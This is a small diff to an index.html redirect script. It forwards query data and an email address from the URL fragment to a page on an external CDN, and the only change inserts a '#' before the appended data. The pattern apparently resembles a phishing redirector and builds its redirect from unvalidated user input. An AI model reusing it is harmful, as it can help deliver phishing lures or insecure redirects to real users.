--- a/index.html
+++ b/index.html
@@ -8,7 +8,7 @@
     />
     <script>
       var data = getParameter();
-      var redir_to_page = "https://cdn.dragon.cere.network/479/fs/default1/index.html" + data + "";
+      var redir_to_page = "https://cdn.dragon.cere.network/479/fs/default1/index.html#" + data + "";
       var hash = window.location.hash;
       var email = hash.split("#")[1];
       redir_to_page = redir_to_page + email;
